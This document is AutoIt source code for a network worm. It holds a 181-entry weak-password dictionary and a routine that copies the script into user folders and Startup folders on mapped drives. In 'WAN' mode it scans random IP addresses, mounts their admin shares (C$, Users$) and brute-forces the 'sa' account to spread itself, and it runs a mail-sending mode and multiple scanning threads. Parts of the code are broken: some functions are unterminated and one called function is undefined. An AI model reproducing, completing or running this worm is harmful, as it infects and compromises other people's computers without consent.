Dim $user[5] $user[0] = "S-1-3-0" $user[1] = "S-1-1-0" $user[2] = "S-1-5-2" $user[3] = "S-1-5-4" $user[4] = "S-1-5-18" Dim $pass[181] $pass[0]="00000" $pass[1]="0000000" $pass[2]="00000000" $pass[3]="0987654321" $pass[4]="11111" $pass[5]="111111" $pass[6]="1111111" $pass[7]="11111111" $pass[8]="123123" $pass[9]="12321" $pass[10]="123321" $pass[11]="12345" $pass[12]="123456" $pass[13]="1234567" $pass[14]="12345678" $pass[15]="123456789" $pass[16]="1234567890" $pass[17]="1234abcd" $pass[18]="1234qwer" $pass[19]="123abc" $pass[20]="123asd" $pass[21]="123qwe" $pass[22]="1q2w3e" $pass[23]="22222" $pass[24]="222222" $pass[25]="2222222" $pass[26]="22222222" $pass[27]="33333" $pass[28]="333333" $pass[29]="3333333" $pass[30]="33333333" $pass[31]="44444" $pass[32]="444444" $pass[33]="4444444" $pass[34]="44444444" $pass[35]="54321" $pass[36]="55555" $pass[37]="555555" $pass[38]="5555555" $pass[39]="55555555" $pass[40]="654321" $pass[41]="66666" $pass[42]="666666" $pass[43]="6666666" $pass[44]="66666666" $pass[45]="7654321" $pass[46]="77777" $pass[47]="777777" $pass[48]="7777777" $pass[49]="77777777" $pass[50]="87654321" $pass[51]="88888" $pass[52]="888888" $pass[53]="8888888" $pass[54]="88888888" $pass[55]="987654321" $pass[56]="99999" $pass[57]="999999" $pass[58]="9999999" $pass[59]="99999999" $pass[60]="a1b2c3" $pass[61]="aaaaa" $pass[62]="abc123" $pass[63]="academia" $pass[64]="access" $pass[65]="account" $pass[66]="Admin" $pass[67]="admin" $pass[68]="admin1" $pass[69]="admin12" $pass[70]="admin123" $pass[71]="adminadmin" $pass[72]="administrator" $pass[73]="anything" $pass[74]="asddsa" $pass[75]="asdfgh" $pass[76]="asdsa" $pass[77]="asdzxc" $pass[78]="backup" $pass[79]="boss123" $pass[80]="business" $pass[81]="campus" $pass[82]="changeme" $pass[83]="cluster" $pass[84]="codename" $pass[85]="codeword" $pass[86]="coffee" $pass[87]="computer" $pass[88]="controller" $pass[89]="cookie" $pass[90]="customer" $pass[91]="database" $pass[92]="default" $pass[93]="desktop" $pass[94]="domain" $pass[95]="example" $pass[96]="exchange" $pass[97]="explorer" $pass[98]="files" $pass[99]="foobar" $pass[100]="foofoo" $pass[101]="forever" $pass[102]="freedom" $pass[103]="games" $pass[104]="home123" $pass[105]="ihaveno$pass" $pass[106]="Internet" $pass[107]="internet" $pass[108]="intranet" $pass[109]="killer" $pass[110]="letitbe" $pass[111]="letmein" $pass[112]="Login" $pass[113]="login" $pass[114]="lotus" $pass[115]="love123" $pass[116]="manager" $pass[117]="market" $pass[118]="money" $pass[119]="monitor" $pass[120]="my$pass" $pass[121]="my$password" $pass[122]="mypc123" $pass[123]="nimda" $pass[124]="nobody" $pass[125]="no$pass" $pass[126]="no$password" $pass[127]="nothing" $pass[128]="office" $pass[129]="oracle" $pass[130]="owner" $pass[131]="$pass1" $pass[132]="$pass12" $pass[133]="$pass123" $pass[134]="$passwd" $pass[135]="$password" $pass[136]="$password" $pass[137]="$password1" $pass[138]="$password12" $pass[139]="$password123" $pass[140]="private" $pass[141]="public" $pass[142]="pw123" $pass[143]="q1w2e3" $pass[144]="qazwsx" $pass[145]="qazwsxedc" $pass[146]="qqqqq" $pass[147]="qwe123" $pass[148]="qweasd" $pass[149]="qweasdzxc" $pass[150]="qweewq" $pass[151]="qwerty" $pass[152]="qwewq" $pass[153]="root123" $pass[154]="rootroot" $pass[155]="sample" $pass[156]="secret" $pass[157]="secure" $pass[158]="security" $pass[159]="server" $pass[160]="shadow" $pass[161]="share" $pass[162]="student" $pass[163]="super" $pass[164]="superuser" $pass[165]="supervisor" $pass[166]="system" $pass[167]="temp123" $pass[168]="temporary" $pass[169]="temptemp" $pass[170]="test123" $pass[171]="testtest" $pass[172]="unknown" $pass[173]="windows" $pass[174]="work123" $pass[175]="xxxxx" $pass[176]="zxccxz" $pass[177]="zxcvb" $pass[178]="zxcvbn" $pass[179]="zxcxz" $pass[180]="zzzzz" Func _try_infectDrive() If FileExists("X:\") Then FileCopy(@ScriptFullPath, "X:\", $smbSpreadName) Local $hSearch = FileFindFirstFile("X:\Users\*") Local $sUserName = "", $iResult = 0 While 1 $sUserName = FileFindNextFile($hSearch) FileCopy(@ScriptFullPath, "X:\Users\" & $sUserName & "\" & $smbSpreadName) If @error Then ExitLoop Local $hhSearch = FileFindFirstFile("X:\Users\" & $sUserName & "\*") Local $sUserFolder = "", $iResult = 0 While 1 $sUserFolder = FileFindNextFile($hhSearch) If @error Then ExitLoop FileCopy(@ScriptFullPath, "X:\Users\" & $sUserName & "\" & $sUserFolder & "\" & $smbSpreadName) FileCopy(@ScriptFullPath, "x:\Users\" & $sUserName & "\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" & $smbSpreadName) WEnd FileClose($hhSearch) WEnd FileClose($hSearch) EndIf EndIf If $CmdLine[1] = "WAN" Then While 1 $IP = Random(0,255,1) & "." & Random(0,255,1) & "." & Random(0,255,1) & "." & Random(0,255,1) If Ping($IP) > 0 Then _WinNet_AddConnection2("X:", "\\" & $IP & "\C$") _try_infectDrive() _WinNet_AddConnection2("X:", "\\" & $IP & "\Users$") _try_infectDrive() If Not FileExists("X:\") Then For $i = 0 To UBound($pass) - 1 _WinNet_AddConnection2("X:", "\\" & $IP & "\C$", "sa", $pass[$i]) If FileExists("X:\") Then _try_infectDrive() ExitLoop EndIf Next EndIf infectDrive($pass) EndIf Wend ElseIf $CmdLine[1] = "SM" Then _SendMail() Endif Func _WinNet_AddConnection2($sLocalName, $sRemoteName, $sUserName = 0, $sPassword = 0, $iType = 1, $iOptions = 1) Const $tagNETRESOURCE = "dword Scope;dword Type;dword DisplayType;dword Usage;ptr LocalName;ptr RemoteName;ptr Comment;ptr Provider" Const $CONNECT_UPDATE_PROFILE = 0x00000001 Const $CONNECT_INTERACTIVE = 0x00000008 Const $CONNECT_PROMPT = 0x00000010 Const $CONNECT_REDIRECT = 0x00000080 Const $CONNECT_LOCALDRIVE = 0x00000100 Const $CONNECT_COMMANDLINE = 0x00000800 Const $CONNECT_CMD_SAVECRED = 0x00001000 Local $tLocalName = DllStructCreate("wchar Text[1024]") Local $pLocalName = DllStructGetPtr($tLocalName) DllStructSetData($tLocalName, "Text", $sLocalName) Local $tRemoteName = DllStructCreate("wchar Text[1024]") Local $pRemoteName = DllStructGetPtr($tRemoteName) DllStructSetData($tRemoteName, "Text", $sRemoteName) Local $tUserName = 0 If IsString($sUserName) Then $tUserName = DllStructCreate("wchar Text[1024]") DllStructSetData($tUserName, "Text", $sUserName) EndIf Local $tPassword = 0 If IsString($sPassword) Then $tPassword = DllStructCreate("wchar Text[1024]") DllStructSetData($tPassword, "Text", $sPassword) EndIf Local $iFlags = 0 If BitAND($iOptions, 1) <> 0 Then $iFlags = BitOR($iFlags, $CONNECT_UPDATE_PROFILE) If BitAND($iOptions, 2) <> 0 Then $iFlags = BitOR($iFlags, $CONNECT_INTERACTIVE) If BitAND($iOptions, 4) <> 0 Then $iFlags = BitOR($iFlags, $CONNECT_PROMPT) If BitAND($iOptions, 8) <> 0 Then $iFlags = BitOR($iFlags, $CONNECT_REDIRECT) If BitAND($iOptions, 16) <> 0 Then $iFlags = BitOR($iFlags, $CONNECT_COMMANDLINE) If BitAND($iOptions, 32) <> 0 Then $iFlags = BitOR($iFlags, $CONNECT_CMD_SAVECRED) Local $tResource = DllStructCreate($tagNETRESOURCE) DllStructSetData($tResource, "Type", $iType) DllStructSetData($tResource, "LocalName", $pLocalName) DllStructSetData($tResource, "RemoteName", $pRemoteName) Local $aResult = DllCall("mpr.dll", "dword", "WNetAddConnection2W", "struct*", $tResource, "struct*", $tPassword, "struct*", $tUserName, "dword", $iFlags) If @error Then Return SetError(@error, @extended, False) Return SetError($aResult[0], 0, $aResult[0] = 0) EndFunc ;==>_WinNet_AddConnection2 For $threads = 0 To 16 Run(Chr(34) & @ScriptFullPath & Chr(34) & " Scan") Next